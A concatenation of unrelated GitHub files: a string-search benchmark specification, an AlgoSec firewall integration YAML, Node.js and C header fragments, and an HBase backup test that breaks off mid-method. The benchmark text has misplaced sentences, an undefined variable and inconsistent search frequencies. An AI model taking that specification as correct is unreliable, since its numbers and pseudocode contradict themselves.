Benchmark for Searching: (0) Identify a search domain S from which strings of the same size are drawn. These strings will form the target data structure as well as the strings to be searched for. The size of the search domain |S| = n = 2^k For example, S4 could be the set of 4-character strings from the set {a,b}. Note that |S4| = 2^4 = 16. (1) Construct a target instance of the data structure of size c*n where c is in the range [0.5, 1.0]. This instance is constructed by the repeated application of the insert operation on the data structure. It is guaranteed that no string appears multiple times in the target instance. c represents the ratio of available elements that will be in the target search list. The target instance is constructed by the following algorithm: Create array SA whose size is |S| and contains all elements of S. idx = n; ct = 0; while (ct < c*n) { select random index i from [0,idx) DS.insert(s); swap SA[i] with SA[idx-1]; idx--; ct++; } (2) Construct a SearchList of search strings to be searched for. The size of SearchList is n/4. This SearchList is constructed in two separate ways: (a) uniform distribution; as with step 1, each string in the SearchList is drawn randomly from S and is never duplicated in SearchList. (b) weighted distribution; given the original search domain S, assign search probabilities to the individual strings in S. 1 string will never be searched 1 string will be searched 50% of the time 2 strings will be searched 25% of the time 4 strings will be searched 12.5% of the time 8 strings will be searched 6.25% of the time ... 2^(k-1) strings will be searched 1/(2^k-1) time Given the set S4 above, the following could be the weighted search probabilities. String Search-prob. ------ ------------ aaaa 0 aaab 8 aaba 4 aabb 4 abaa 2 abab 2 abba 2 abbb 2 baaa 1 baab 1 baba 1 babb 1 bbaa 1 bbab 1 bbba 1 bbbb 1 (3) For each element in SearchList, search for the item. Measure the number of "probes", that is, inspections within the target data structure for the given element. Also keep track of total time so you can compute the average cost of a search. This will ensure that DS contains no duplicates. For example, c could be .5 and the DS could be a linear list: aaab baba abaa bbbb baaa aaaa aaba babb Note that here, the list is unordered. The initial setup is to identify the following class of strings. 1 string will never be searched for n/2 of these strings will be searched-for one time n/4 of these strings will be searched-for two times n/8 will be searched-for four times n/16 will be searched-for eight times n/32 will be searched-for sixteen times
{ "pile_set_name": "Github" }
commonfields: id: AlgoSec version: -1 name: AlgoSec display: AlgoSec system: true category: Network Security image: data:image/png;base64,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 description: Algosec BusinessFlow(ABF), Firewall Analyzer (AFA) and FireFlow(AFF). configuration: - display: Server URL (e.g. https://192.168.0.1) name: server defaultvalue: "" type: 0 required: true - display: Credentials name: credentials defaultvalue: "" type: 9 required: true - display: Trust any certificate (not secure) name: insecure defaultvalue: "" type: 8 required: false - display: Use system proxy settings name: proxy defaultvalue: "" type: 8 required: false script: script: >- var username = params.credentials.identifier; var password = params.credentials.password; var server = params.server.replace(/[\/]+$/, ''); var insecure = params.insecure; var proxy = params.proxy; var baseAFF = server + '/WebServices/WSDispatcher.pl'; var baseAFA = server + '/afa/php/ws.php'; var baseBF = server + '/BusinessFlow/rest/v1/network_objects/find'; function fillInSoapContent(content, service) { var request = service === 'AFF' ? '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsh="https://www.algosec.com/WSHandler"><soapenv:Header/><soapenv:Body>%content%</soapenv:Body></soapenv:Envelope>' : '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:afa="https://www.algosec.com/afa-ws"><soapenv:Header/><soapenv:Body>%content%</soapenv:Body></soapenv:Envelope>'; return replaceInTemplates(request, {content: content}); } function fillInSOAPRequestTemplate(method, content, service) { var template = service === 'AFF' ? '<wsh:%method%><FFWSHeader><version>1</version></FFWSHeader>%content%</wsh:%method%>' : '<afa:%method%>%content%</afa:%method%>'; return fillInSoapContent(replaceInTemplates(template, {content: content, method: method}), service); } var responseDict = { 'authenticate': /<sessionId xsi:type="xsd:string">(.*)<\/sessionId/, 'getTicket': /<soap:Body>((.|\n)*)<\/soap:Body/, 'createTicket': /<soap:Body>((.|\n)*)<\/soap:Body/, 'ConnectRequest': /<SessionID>(.*)<\/SessionID/, 'DisconnectRequest': /<ns1:DisconnectResponse>(.*)<\/ns1:DisconnectResponse/, 'QueryRequest': /<SOAP-ENV:Body>((.|\n)*)<\/SOAP-ENV:Body/ }; var commandToMethod = { 'algosec-get-ticket': 'getTicket', 'algosec-create-ticket': 'createTicket', 'algosec-query': 'QueryRequest' }; var commandToURL = { 'algosec-get-applications': '/applications', 'algosec-get-network-object': '' }; var sessionData = '<sessionId>%sessionId%</sessionId>'; var methodDict = { 'authenticate': '<username>%username%</username><password>%password%</password>', 'getTicket': sessionData + '<ticketId>%ticketId%</ticketId>', 'trafficLines': '<trafficLines><action>%action%</action><trafficDestination><address>%destAddress%</address></trafficDestination><trafficService><service>ftp</service></trafficService><trafficSource><address>%sourceAddress%</address></trafficSource><trafficUser><user>%user%</user></trafficUser><trafficApplication><application>%application%</application></trafficApplication></trafficLines>', 'createTicket': sessionData + '<ticket><requestor>%requestor%</requestor><subject>%subject%</subject>%trafficLines%</ticket>', 'ConnectRequest': '<UserName>%username%</UserName><Password>%password%</Password>', 'DisconnectRequest': '<SessionID>%sessionId%</SessionID>', 'QueryRequest': '<SessionID>%sessionId%</SessionID><QueryInput>%query%</QueryInput>', 'QueryInput': '<Source>%source%</Source><Destination>%destination%</Destination><Service>%service%</Service>' }; var affCommands = ['algosec-create-ticket', 'algosec-get-ticket']; var bfCommands = ['algosec-get-applications', 'algosec-get-network-object']; function createTemplate(method, args) { switch (method) { case 'createTicket': var trafficLines = (args.description ? '<description>"%description%"</description>' : '') + methodDict['trafficLines']; return replaceInTemplates(methodDict[method], {trafficLines: trafficLines}); case 'QueryRequest': var query = methodDict['QueryInput'] + (args.user ? '<User>%user%</User>' : '') + (args.application ? '<Application>%application%</Application>' : ''); return replaceInTemplates(methodDict[method], {query: query}); default: return methodDict[method]; } } function sendSOAPRequest(method, args, service) { var req = fillInSOAPRequestTemplate(method, replaceInTemplates(createTemplate(method, args), args), service); var res = http( service === 'AFF' ? baseAFF : baseAFA, { Method: 'POST', Body: req }, insecure, proxy ); if (res.StatusCode < 200 || res.StatusCode >= 300) { throw 'Failed to ' + method + ', request status code: ' + res.StatusCode + ' and Body: ' + res.Body + '.'; } return res.Body; } function sendRESTRequest(url, args) { var res = http( baseBF + url + encodeToURLQuery(args), { Method: 'GET', Username: username, Password: password }, insecure, proxy ); if (res.StatusCode < 200 || res.StatusCode >= 300) { throw 'Failed to ' + url + ', request status code: ' + res.StatusCode + ' and Body: ' + res.Body + '.'; } return res.Body; } function sendAndParse(method, args, service) { var responseXML = sendSOAPRequest(method, args, service); var match = responseDict[method].exec(responseXML); if (match && match[1]) { return match[1]; } throw method +' failed'; } if (command === 'test-module') { if (sendAndParse('authenticate', {username: username, password: password}, 'AFF')) { return 'ok'; } return 'something is wrong'; } if (affCommands.indexOf(command) !== -1) { args.sessionId = sendAndParse('authenticate', {username: username, password: password}, 'AFF'); return JSON.parse(x2j(sendAndParse(commandToMethod[command], args, 'AFF'))); } if (bfCommands.indexOf(command) !== -1) { return JSON.parse(sendRESTRequest(commandToURL[command] ,args)); } args.sessionId = sendAndParse('ConnectRequest', {username: username, password: password}, 'AFA'); res = JSON.parse(x2j(sendAndParse(commandToMethod[command], args))); sendAndParse('DisconnectRequest', {sessionId: args.sessionId}, 'AFA'); return res; type: javascript commands: - name: algosec-get-ticket arguments: - name: ticketId required: true default: true description: ID of requested change request description: Retrieves a FireFlow change request by its ID - name: algosec-create-ticket arguments: - name: description description: A free text description of the issue - name: devices description: A list of device names, on which the change should be made - name: action required: true description: | The device action to perform for the traffic. This can be either of the following: \U0010FC00 1 - Allow the traffic \U0010FC00 0 - Block the traffic predefined: - "0" - "1" - name: destAddress required: true description: The destination address to perform the action on - name: sourceAddress required: true description: The source address to perform the action on - name: requestor required: true description: The email address of the requestor - name: subject required: true description: The change request's title - name: service required: true description: The device service or port for the connection, for example, "http" or Mandatory "tcp/123" - name: user required: true description: The user for the connection - name: application required: true description: The application for the connection description: Creates a new FireFlow change request - name: algosec-get-applications arguments: - name: address required: true default: true description: The IP/Subnet to search - name: type auto: PREDEFINED predefined: - INTERSECT - CONTAINED - CONTAINING - EXACT description: The search method for the address description: Find applications containing network objects related to IP address using BusinessFlow - name: algosec-get-network-object arguments: - name: address required: true default: true description: The IP/Subnet to search - name: type auto: PREDEFINED predefined: - INTERSECT - CONTAINED - CONTAINING - EXACT description: The search method for the address (default is INTERSECT) description: Find network objects related to IP address - name: algosec-query arguments: - name: source required: true default: true description: source(s) for the query. Multiple values are separated by commas (,) - name: destination required: true description: destination(s) for the query. Multiple values are separated by commas (,) - name: service required: true description: service(s) for the query. Multiple values are separated by commas (,) - name: user description: user for the query - name: application description: application for the query description: Performs a batch traffic simulation query using Firewall Analyzer runonce: false tests: - No tests fromversion: 5.0.0
{ "pile_set_name": "Github" }
<!-- YAML added: - v13.4.0 - v12.16.0 --> > Stability: 1 - captureRejections is experimental. Value: `Symbol.for('nodejs.rejection')` See how to write a custom [rejection handler][rejection].
{ "pile_set_name": "Github" }
A line of text 1 A line of text 2 A line of text 3 A line of text 4
{ "pile_set_name": "Github" }
/* Copyright (c) 2002-2012 Croteam Ltd. This program is free software; you can redistribute it and/or modify it under the terms of version 2 of the GNU General Public License as published by the Free Software Foundation This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ // Animation names #define FLOOR_ANIM_DEFAULT_ANIMATION 0 // Color names // Patch names // Names of collision boxes #define FLOOR_COLLISION_BOX_PART_NAME 0 // Attaching position names // Sound names
{ "pile_set_name": "Github" }
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hbase; import static org.junit.Assert.assertTrue; import java.io.IOException; import java.nio.charset.Charset; import java.util.ArrayList; import java.util.List; import java.util.Set; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.hbase.backup.BackupAdmin; import org.apache.hadoop.hbase.backup.BackupInfo; import org.apache.hadoop.hbase.backup.BackupInfo.BackupState; import org.apache.hadoop.hbase.backup.BackupRequest; import org.apache.hadoop.hbase.backup.BackupRestoreConstants; import org.apache.hadoop.hbase.backup.BackupType; import org.apache.hadoop.hbase.backup.RestoreRequest; import org.apache.hadoop.hbase.backup.impl.BackupAdminImpl; import org.apache.hadoop.hbase.backup.impl.BackupManager; import org.apache.hadoop.hbase.backup.impl.BackupSystemTable; import org.apache.hadoop.hbase.chaos.actions.RestartRandomRsExceptMetaAction; import org.apache.hadoop.hbase.chaos.monkies.PolicyBasedChaosMonkey; import org.apache.hadoop.hbase.chaos.policies.PeriodicRandomActionPolicy; import org.apache.hadoop.hbase.chaos.policies.Policy; import org.apache.hadoop.hbase.client.Admin; import org.apache.hadoop.hbase.client.ColumnFamilyDescriptor; import org.apache.hadoop.hbase.client.ColumnFamilyDescriptorBuilder; import org.apache.hadoop.hbase.client.Connection; import org.apache.hadoop.hbase.client.Table; import org.apache.hadoop.hbase.client.TableDescriptor; import org.apache.hadoop.hbase.client.TableDescriptorBuilder; import org.apache.hadoop.hbase.testclassification.IntegrationTests; import org.apache.hadoop.util.ToolRunner; import org.apache.hbase.thirdparty.com.google.common.base.MoreObjects; import org.apache.hbase.thirdparty.com.google.common.collect.Lists; import org.apache.hbase.thirdparty.com.google.common.util.concurrent.Uninterruptibles; import org.apache.hbase.thirdparty.org.apache.commons.cli.CommandLine; import org.junit.After; import org.junit.Assert; import org.junit.Before; import org.junit.Test; import org.junit.experimental.categories.Category; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * An integration test to detect regressions in HBASE-7912. Create * a table with many regions, load data, perform series backup/load operations, * then restore and verify data * @see <a href="https://issues.apache.org/jira/browse/HBASE-7912">HBASE-7912</a> * @see <a href="https://issues.apache.org/jira/browse/HBASE-14123">HBASE-14123</a> */ @Category(IntegrationTests.class) public class IntegrationTestBackupRestore extends IntegrationTestBase { private static final String CLASS_NAME = IntegrationTestBackupRestore.class.getSimpleName(); protected static final Logger LOG = LoggerFactory.getLogger(IntegrationTestBackupRestore.class); protected static final String NUMBER_OF_TABLES_KEY = "num_tables"; protected static final String COLUMN_NAME = "f"; protected static final String REGION_COUNT_KEY = "regions_per_rs"; protected static final String REGIONSERVER_COUNT_KEY = "region_servers"; protected static final String ROWS_PER_ITERATION_KEY = "rows_in_iteration"; protected static final String NUM_ITERATIONS_KEY = "num_iterations"; protected static final int DEFAULT_REGION_COUNT = 10; protected static final int DEFAULT_REGIONSERVER_COUNT = 5; protected static final int DEFAULT_NUMBER_OF_TABLES = 1; protected static final int DEFAULT_NUM_ITERATIONS = 10; protected static final int DEFAULT_ROWS_IN_ITERATION = 500000; protected static final String SLEEP_TIME_KEY = "sleeptime"; // short default interval because tests don't run very long. protected static final long SLEEP_TIME_DEFAULT = 50000L; protected static int rowsInIteration; protected static int regionsCountPerServer; protected static int regionServerCount; protected static int numIterations; protected static int numTables; protected static TableName[] tableNames; protected long sleepTime; protected static Object lock = new Object(); private static String BACKUP_ROOT_DIR = "backupIT"; @Override @Before public void setUp() throws Exception { util = new IntegrationTestingUtility(); Configuration conf = util.getConfiguration(); regionsCountPerServer = conf.getInt(REGION_COUNT_KEY, DEFAULT_REGION_COUNT); regionServerCount = conf.getInt(REGIONSERVER_COUNT_KEY, DEFAULT_REGIONSERVER_COUNT); rowsInIteration = conf.getInt(ROWS_PER_ITERATION_KEY, DEFAULT_ROWS_IN_ITERATION); numIterations = conf.getInt(NUM_ITERATIONS_KEY, DEFAULT_NUM_ITERATIONS); numTables = conf.getInt(NUMBER_OF_TABLES_KEY, DEFAULT_NUMBER_OF_TABLES); sleepTime = conf.getLong(SLEEP_TIME_KEY, SLEEP_TIME_DEFAULT); enableBackup(conf); LOG.info("Initializing cluster with {} region servers.", regionServerCount); util.initializeCluster(regionServerCount); LOG.info("Cluster initialized and ready"); } @After public void tearDown() throws IOException { LOG.info("Cleaning up after test."); if(util.isDistributedCluster()) { deleteTablesIfAny(); LOG.info("Cleaning up after test. Deleted tables"); cleanUpBackupDir(); } LOG.info("Restoring cluster."); util.restoreCluster(); LOG.info("Cluster restored."); } @Override public void setUpMonkey() throws Exception { Policy p = new PeriodicRandomActionPolicy(sleepTime, new RestartRandomRsExceptMetaAction(sleepTime)); this.monkey = new PolicyBasedChaosMonkey(util, p); startMonkey(); } private void deleteTablesIfAny() throws IOException { for (TableName table : tableNames) { util.deleteTableIfAny(table); } } private void createTables() throws Exception { tableNames = new TableName[numTables]; for (int i = 0; i < numTables; i++) { tableNames[i] = TableName.valueOf(CLASS_NAME + ".table." + i); } for (TableName table : tableNames) { createTable(table); } } private void enableBackup(Configuration conf) { // Enable backup conf.setBoolean(BackupRestoreConstants.BACKUP_ENABLE_KEY, true); BackupManager.decorateMasterConfiguration(conf); BackupManager.decorateRegionServerConfiguration(conf); } private void cleanUpBackupDir() throws IOException { FileSystem fs = FileSystem.get(util.getConfiguration()); fs.delete(new Path(BACKUP_ROOT_DIR), true); } @Test public void testBackupRestore() throws Exception { BACKUP_ROOT_DIR = util.getDataTestDirOnTestFS() + Path.SEPARATOR + BACKUP_ROOT_DIR; createTables(); runTestMulti(); } private void runTestMulti() throws IOException { LOG.info("IT backup & restore started"); Thread[] workers = new Thread[numTables]; for (int i = 0; i < numTables; i++) { final TableName table = tableNames[i]; Runnable r = new Runnable() { @Override public void run() { try { runTestSingle(table); } catch (IOException e) { LOG.error("Failed", e); Assert.fail(e.getMessage()); } } }; workers[i] = new Thread(r); workers[i].start(); } // Wait all workers to finish for (Thread t : workers) { Uninterruptibles.joinUninterruptibly(t); } LOG.info("IT backup & restore finished"); } private void createTable(TableName tableName) throws Exception { long startTime, endTime; TableDescriptorBuilder builder = TableDescriptorBuilder.newBuilder(tableName); TableDescriptor desc = builder.build(); ColumnFamilyDescriptorBuilder cbuilder = ColumnFamilyDescriptorBuilder.newBuilder(COLUMN_NAME.getBytes(Charset.defaultCharset())); ColumnFamilyDescriptor[] columns = new ColumnFamilyDescriptor[] { cbuilder.build() }; LOG.info("Creating table {} with {} splits.", tableName, regionsCountPerServer * regionServerCount); startTime = System.currentTimeMillis(); HBaseTestingUtility.createPreSplitLoadTestTable(util.getConfiguration(), desc, columns, regionsCountPerServer); util.waitTableAvailable(tableName); endTime = System.currentTimeMillis(); LOG.info("Pre-split table created successfully in {}ms.", (endTime - startTime)); } private void loadData(TableName table, int numRows) throws IOException { Connection conn = util.getConnection(); // #0- insert some data to a table Table t1 = conn.getTable(table); util.loadRandomRows(t1, new byte[]{'f'}, 100, numRows); // flush table conn.getAdmin().flush(TableName.valueOf(table.getName())); } private String backup(BackupRequest request, 